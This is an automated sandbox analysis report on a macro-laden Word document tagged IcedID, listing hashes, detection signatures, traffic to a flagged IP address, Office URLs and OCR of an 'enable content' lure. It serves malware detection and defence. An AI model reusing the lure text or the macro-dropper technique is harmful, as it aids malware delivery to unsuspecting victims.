Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
berniesbooksdocument08.11.doc

Overview

General Information

Sample Name:berniesbooksdocument08.11.doc
Analysis ID:682633
MD5:2b10f2617b32857999df1cf5f19f0d8d
SHA1:448e513536aa0c576b123d5b243e1bdc6d261d6f
SHA256:3b86f8aff12d2b32461a0b20f01f3d13ee062c80cb647ce09ff33f296b1f9e47
Tags:docIcedID
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (UrlDownloadToFile)
Machine Learning detection for sample
Potential document exploit detected (unknown TCP traffic)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
IP address seen in connection with other malware
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 5752 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: berniesbooksdocument08.11.docVirustotal: Detection: 25%Perma Link
Source: berniesbooksdocument08.11.docReversingLabs: Detection: 15%
Source: berniesbooksdocument08.11.docJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
Source: global trafficTCP traffic: 192.168.2.3:49742 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.3:49742 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.3:49742 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.3:49742 -> 45.8.146.139:80
Source: Joe Sandbox ViewIP Address: 45.8.146.139 45.8.146.139
Source: Joe Sandbox ViewIP Address: 45.8.146.139 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://api.aadrm.com
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://api.aadrm.com/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://api.cortana.ai
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://api.office.net
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://api.onedrive.com
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://augloop.office.com
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://cdn.entity.
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://clients.config.office.net/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://config.edge.skype.com
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://cortana.ai
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://cortana.ai/api
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://cr.office.com
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://dev.cortana.ai
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://devnull.onenote.com
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://directory.services.
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://enrichment.osi.office.net/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://graph.windows.net
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://graph.windows.net/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://invites.office.com/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://lifecycle.office.com
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://login.windows.local
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://management.azure.com
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://management.azure.com/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://messaging.action.office.com/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://messaging.engagement.office.com/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://messaging.office.com/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://my.microsoftpersonalcontent.com
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://ncus.contentsync.
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://officeapps.live.com
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://onedrive.live.com
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://osi.office.net
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://otelrules.azureedge.net
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://outlook.office.com
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://outlook.office.com/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://outlook.office365.com
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://outlook.office365.com/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://pages.store.office.com/review/query
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://roaming.edog.
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://settings.outlook.com
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://staging.cortana.ai
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://tasks.office.com
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://wus2.contentsync.
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary

barindex
Source: Screenshot number: 4Screenshot OCR: Enable editing" button on W a the top bar, and then click "Enable content'. ~ a'"""=.= m % I
Source: Screenshot number: 4Screenshot OCR: Enable content'. ~ a'"""=.= m % I i '00% O Type here to search Ki E a a g wg sf ^ 7'41 P
Source: Screenshot number: 12Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content". W L 'd"" - '0 - a" 4 At-
